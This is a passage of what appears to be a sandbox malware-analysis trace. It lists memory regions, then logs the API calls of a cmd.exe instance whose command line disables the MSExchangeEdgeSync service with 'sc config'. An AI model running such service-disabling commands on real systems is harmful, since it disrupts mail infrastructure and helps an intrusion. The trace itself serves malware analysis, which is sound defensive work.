end_va = 0x4941fff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 6943 start_va = 0x4950000 end_va = 0x4963fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 6944 start_va = 0x4970000 end_va = 0x49affff entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 6945 start_va = 0x49b0000 end_va = 0x4aaffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 6946 start_va = 0x4ab0000 end_va = 0x4ab3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 6947 start_va = 0x4ac0000 end_va = 0x4ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ac0000" filename = "" Region: id = 6948 start_va = 0x4ad0000 end_va = 0x4ad1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 6949 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6950 start_va = 0x7f780000 end_va = 0x7f7a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f780000" filename = "" Region: id = 6951 start_va = 0x7f7aa000 end_va = 0x7f7aafff entry_point = 0x0 region_type = private name = "private_0x000000007f7aa000" filename = "" Region: id = 6952 start_va = 0x7f7ac000 end_va = 0x7f7aefff entry_point = 0x0 region_type = private name = "private_0x000000007f7ac000" filename = "" Region: id = 6953 start_va = 0x7f7af000 end_va = 0x7f7affff entry_point = 0x0 region_type = private name = "private_0x000000007f7af000" filename = "" Region: id = 6954 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6955 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6956 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6957 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6958 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6959 start_va = 0x4c40000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 6960 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6961 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6962 start_va = 0x4df0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 6963 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7004 start_va = 0x4920000 end_va = 0x492ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004920000" filename = "" Region: id = 7005 start_va = 0x4ae0000 end_va = 0x4b9dfff entry_point = 0x4ae0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7006 start_va = 0x4ba0000 end_va = 0x4bdffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 7007 start_va = 0x4c50000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 7008 start_va = 0x50c0000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 7009 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7010 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7011 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7012 start_va = 0x7f680000 end_va = 0x7f77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f680000" filename = "" Region: id = 7013 start_va = 0x7f7a7000 end_va = 0x7f7a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f7a7000" filename = "" Region: id = 7014 start_va = 0x4930000 end_va = 0x4933fff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 7015 start_va = 0x4940000 end_va = 0x4943fff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 7016 start_va = 0x50d0000 end_va = 0x5406fff entry_point = 0x50d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 439 os_tid = 0xf3c [0129.752] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0129.752] __set_app_type (_Type=0x1) [0129.752] __p__fmode () returned 0x77ac4d6c [0129.752] __p__commode () returned 0x77ac5b1c [0129.752] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0129.753] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0129.753] GetCurrentThreadId () returned 0xf3c [0129.753] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x84 [0129.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.753] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0129.753] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.755] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.755] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4aaff0c | out: phkResult=0x4aaff0c*=0x0) returned 0x2 [0129.756] VirtualQuery (in: lpAddress=0x4aaff13, lpBuffer=0x4aafec4, dwLength=0x1c | out: lpBuffer=0x4aafec4*(BaseAddress=0x4aaf000, AllocationBase=0x49b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.756] VirtualQuery (in: lpAddress=0x49b0000, lpBuffer=0x4aafec4, dwLength=0x1c | out: lpBuffer=0x4aafec4*(BaseAddress=0x49b0000, AllocationBase=0x49b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.756] VirtualQuery (in: lpAddress=0x49b1000, lpBuffer=0x4aafec4, dwLength=0x1c | out: lpBuffer=0x4aafec4*(BaseAddress=0x49b1000, AllocationBase=0x49b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.756] VirtualQuery (in: lpAddress=0x49b3000, lpBuffer=0x4aafec4, dwLength=0x1c | out: lpBuffer=0x4aafec4*(BaseAddress=0x49b3000, AllocationBase=0x49b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.756] VirtualQuery (in: lpAddress=0x4ab0000, lpBuffer=0x4aafec4, dwLength=0x1c | out: lpBuffer=0x4aafec4*(BaseAddress=0x4ab0000, AllocationBase=0x4ab0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.756] GetConsoleOutputCP () returned 0x1b5 [0129.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.756] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0129.756] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.756] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0129.756] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.756] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.757] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.757] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.757] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.757] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.757] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.757] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0129.757] GetEnvironmentStringsW () returned 0x4df7da0* [0129.757] FreeEnvironmentStringsA (penv="A") returned 1 [0129.757] GetEnvironmentStringsW () returned 0x4df7da0* [0129.757] FreeEnvironmentStringsA (penv="A") returned 1 [0129.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4aaee70 | out: phkResult=0x4aaee70*=0x94) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0xb8, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x1, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0x1, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x0, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x40, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x40, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0x40, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegCloseKey (hKey=0x94) returned 0x0 [0129.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4aaee70 | out: phkResult=0x4aaee70*=0x94) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0x40, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x1, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0x1, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x0, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x9, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x4, lpData=0x4aaee7c*=0x9, lpcbData=0x4aaee78*=0x4) returned 0x0 [0129.758] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4aaee74, lpData=0x4aaee7c, lpcbData=0x4aaee78*=0x1000 | out: lpType=0x4aaee74*=0x0, lpData=0x4aaee7c*=0x9, lpcbData=0x4aaee78*=0x1000) returned 0x2 [0129.758] RegCloseKey (hKey=0x94) returned 0x0 [0129.758] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29832 [0129.758] srand (_Seed=0x5ad29832) [0129.758] GetCommandLineW () returned="/c sc config MSExchangeEdgeSync start= disabled" [0129.758] GetCommandLineW () returned="/c sc config MSExchangeEdgeSync start= disabled" [0129.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.758] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4df9cf8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0129.758] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.758] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.758] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.758] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.758] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.758] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.758] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.758] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.759] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.759] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.759] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.759] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.759] GetEnvironmentStringsW () returned 0x4df7da0* [0129.759] FreeEnvironmentStringsA (penv="A") returned 1 [0129.759] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.759] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.759] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.759] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.759] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.759] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.759] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.759] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.759] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.759] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.759] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aafc48 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.759] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4aafc48, lpFilePart=0x4aafc40 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4aafc40*="Desktop") returned 0x1d [0129.759] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.759] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4aaf9c8 | out: lpFindFileData=0x4aaf9c8) returned 0x4df05c8 [0129.760] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0129.760] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4aaf9c8 | out: lpFindFileData=0x4aaf9c8) returned 0x4df05c8 [0129.760] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0129.760] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0129.760] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4aaf9c8 | out: lpFindFileData=0x4aaf9c8) returned 0x4df05c8 [0129.760] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0129.760] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.760] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0129.760] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0129.760] GetEnvironmentStringsW () returned 0x4df7da0* [0129.760] FreeEnvironmentStringsA (penv="=") returned 1 [0129.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.761] GetConsoleOutputCP () returned 0x1b5 [0129.761] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.761] GetUserDefaultLCID () returned 0x409 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4aafd78, cchData=128 | out: lpLCData="0") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4aafd78, cchData=128 | out: lpLCData="0") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4aafd78, cchData=128 | out: lpLCData="1") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0129.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0129.761] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.762] GetConsoleTitleW (in: lpConsoleTitle=0x4dfaa48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.763] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0129.763] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0129.763] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0129.763] _wcsicmp (_String1="sc", _String2=")") returned 74 [0129.763] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0129.763] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0129.763] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0129.763] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0129.763] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0129.763] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0129.764] GetConsoleTitleW (in: lpConsoleTitle=0x4aafa60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.764] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.764] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.764] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.764] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.764] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.764] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.764] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.764] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.765] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.765] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.765] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.765] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.765] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.765] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.765] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.765] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.765] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.765] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.765] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.765] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.765] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.765] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.765] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.765] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.765] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.765] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.765] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.765] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.765] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.765] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.765] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.765] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.765] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.765] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.765] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.765] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.765] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.765] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.765] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.765] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.766] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.766] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.766] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.766] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.766] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.766] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.766] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.766] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.766] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.766] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.766] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.766] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.766] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.766] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.766] _wcsicmp (_String1="sc", _String2="POPD") 